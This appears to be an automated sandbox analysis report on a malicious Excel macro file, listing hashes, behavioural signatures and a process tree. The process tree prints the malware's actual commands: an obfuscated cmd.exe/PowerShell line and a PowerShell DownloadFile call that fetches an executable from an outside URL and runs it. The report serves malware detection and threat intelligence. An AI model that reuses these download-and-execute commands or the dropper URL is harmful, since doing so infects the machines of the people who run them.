Analysis
-
max time kernel
109s -
max time network
141s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
05/08/2021, 18:27
Behavioral task
behavioral1
Sample
fileattached.xlsm
Resource
win7v20210410
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
fileattached.xlsm
Resource
win10v20210408
0 signatures
0 seconds
General
-
Target
fileattached.xlsm
-
Size
12KB
-
MD5
2d827df1ee25674aac2060c37efa2fe7
-
SHA1
c3c6a82ee16f87ebacdd8be47018be38b6c98a27
-
SHA256
436651743894169dc9cd4c7ef01734420a5ce2d6dcaf57825197e0c756feeee9
-
SHA512
93258ac910bcad2633dfaa947edf88b3cfea5bb625b071e005fc7ba117e1307a77a6ddc5a8a7ab14a3cea646d8743dc60e5cdc0271ee8eb467faf2a06d739d66
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://iurl.vip/bij0o
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3832 3716 cmd.exe 67 Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3896 3716 powershell.exe 67 -
Blocklisted process makes network request 2 IoCs
flow pid Process 25 3896 powershell.exe 27 3896 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 388 zJAMC.exe -
Uses the VBS compiler for execution 1 TTPs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 3832 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3716 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 3980 powershell.exe 3980 powershell.exe 3896 powershell.exe 3980 powershell.exe 3896 powershell.exe 3896 powershell.exe 388 zJAMC.exe 388 zJAMC.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3980 powershell.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeDebugPrivilege 388 zJAMC.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3716 wrote to memory of 3832 3716 EXCEL.EXE 77 PID 3716 wrote to memory of 3832 3716 EXCEL.EXE 77 PID 3716 wrote to memory of 3896 3716 EXCEL.EXE 79 PID 3716 wrote to memory of 3896 3716 EXCEL.EXE 79 PID 3832 wrote to memory of 3980 3832 cmd.exe 81 PID 3832 wrote to memory of 3980 3832 cmd.exe 81 PID 3980 wrote to memory of 388 3980 powershell.exe 86 PID 3980 wrote to memory of 388 3980 powershell.exe 86 PID 3980 wrote to memory of 388 3980 powershell.exe 86 PID 388 wrote to memory of 2988 388 zJAMC.exe 87 PID 388 wrote to memory of 2988 388 zJAMC.exe 87 PID 388 wrote to memory of 2988 388 zJAMC.exe 87
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\fileattached.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\SYSTEM32\cmd.execmd /c p^o^w^e^r^s^h^e^l^l.e^xe -w 1 Start-Sleep 10;%Temp%\zJAMC.exe2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w 1 Start-Sleep 10;C:\Users\Admin\AppData\Local\Temp\zJAMC.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Users\Admin\AppData\Local\Temp\zJAMC.exe"C:\Users\Admin\AppData\Local\Temp\zJAMC.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵PID:2988
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell (nEw-oBjecT Net.WebcLIENt).('Down'+'loadFile').Invoke('http://iurl.vip/bij0o',$env:Temp+'\zJAMC.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3896
-